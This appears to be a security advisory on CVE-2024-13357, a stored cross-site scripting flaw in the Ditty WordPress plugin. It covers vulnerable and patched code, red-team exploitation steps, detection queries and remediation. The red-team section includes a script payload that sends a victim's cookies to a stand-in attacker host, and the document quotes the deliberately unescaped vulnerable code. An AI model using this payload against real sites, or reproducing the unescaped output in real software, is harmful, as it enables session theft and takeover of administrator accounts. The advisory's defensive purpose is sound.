CVE-2024-13357
Executive Summary
CVE-2024-13357 is a Stored Cross-Site Scripting (XSS) vulnerability in the Ditty WordPress plugin, affecting versions prior to 3.1.52. The vulnerability arises from insufficient sanitization and escaping of certain plugin settings, allowing high-privilege users (e.g., authors) to inject arbitrary web scripts. These scripts execute in the context of other users’ browsers when they view the affected settings page or content. In a multisite WordPress environment, where the unfiltered_html capability is typically disallowed, this flaw bypasses that restriction, enabling privilege escalation and potential site compromise.

Supply Chain & Package Security
This vulnerability is specific to the WordPress plugin ecosystem. The Ditty plugin is distributed via the official WordPress Plugin Directory. Users are advised to verify the integrity of the plugin by checking its checksum against the official repository. No known supply chain compromise has been reported for this plugin.
CVSS Breakdown & Threat Level
- CVSS Score: 4.8 (Medium)
- Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: High (Author-level)
- User Interaction: Required (Admin viewing settings)
- Scope: Changed
- Confidentiality Impact: Low
- Integrity Impact: Low
- Availability Impact: None
Threat Level: Medium. Exploitation requires authenticated access with author privileges, but in multisite setups, this is a common user role. The impact is limited to script execution in the admin context, but can lead to further compromise.
Deep Dive & Mechanics
The vulnerability exists in the Ditty plugin’s settings handling. The plugin fails to properly sanitize and escape user-supplied input before storing it in the database and later rendering it in the WordPress admin panel. Specifically, settings fields that accept HTML or rich text are not filtered through WordPress’s wp_kses() or similar functions, allowing an attacker with author-level privileges to inject malicious JavaScript.
Attack Flow:
- An attacker with an author account navigates to the Ditty settings page.
- The attacker inserts a malicious payload (e.g.,
<script>alert('XSS')</script>) into an unsanitized settings field. - The plugin stores the payload in the
wp_optionstable. - When an administrator or other user views the Ditty settings page, the payload is rendered without escaping, executing the script in their browser.
- The attacker can then steal cookies, perform actions on behalf of the admin, or deface the site.
Root Cause: Lack of output escaping on settings fields. The plugin uses echo $value; instead of echo esc_html( $value ); or similar.
Vulnerable vs. Patched Code
Vulnerable Code (version < 3.1.52):
// In ditty-admin.php or similar
function ditty_render_setting_field( $field ) {
$value = get_option( $field['name'] );
echo '<input type="text" name="' . $field['name'] . '" value="' . $value . '" />';
}
Patched Code (version 3.1.52):
function ditty_render_setting_field( $field ) {
$value = get_option( $field['name'] );
echo '<input type="text" name="' . esc_attr( $field['name'] ) . '" value="' . esc_attr( $value ) . '" />';
}
The patch adds esc_attr() to escape the output, preventing script injection.
Exploitation & Lab Setup
Red Team
Prerequisites:
- WordPress installation with Ditty plugin < 3.1.52.
- Author-level account credentials.
Exploitation Steps:
- Log in as an author.
- Navigate to
wp-admin/admin.php?page=ditty-settings. - Locate a text field (e.g., "Custom CSS" or "Header Scripts").
- Inject payload:
<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>. - Save settings.
- Wait for an admin to visit the settings page, or trigger the page yourself to execute the payload.
Note: No public exploit code is available for this CVE.
Blue Team
Detection:
- Monitor for unusual changes to the
wp_optionstable, specifically options prefixed withditty_. - Look for HTTP requests to
wp-admin/admin.php?page=ditty-settingsfrom author-level users. - Inspect plugin settings for unexpected script tags.
Hunting:
- Query the database:
SELECT * FROM wp_options WHERE option_name LIKE '%ditty%' AND option_value LIKE '%<script%'; - Review WordPress audit logs for settings changes by authors.
Indicators of Compromise (IOCs)
- File:
/wp-content/plugins/ditty/ditty-admin.php(version < 3.1.52) - Database:
wp_optionsrows withoption_namecontainingdittyandoption_valuecontaining<script>tags. - Network: Outbound connections to attacker-controlled domains from the WordPress admin panel.
- Logs:
wp-admin/admin.php?page=ditty-settingsaccessed by author-level users.

Remediation & Mitigation
Immediate:
- Upgrade Ditty plugin to version 3.1.52 or later.
- If upgrade is not possible, disable the plugin temporarily.
Long-term:
- Implement a Web Application Firewall (WAF) rule to block
<script>tags in plugin settings. - Restrict author-level users from accessing plugin settings pages via role management.
- Enable WordPress’s built-in
DISALLOW_UNFILTERED_HTMLconstant inwp-config.php(already default in multisite).
Verification:
- After patching, confirm the plugin version in
wp-admin/plugins.php. - Scan the database for any existing malicious payloads using the IOC query above.
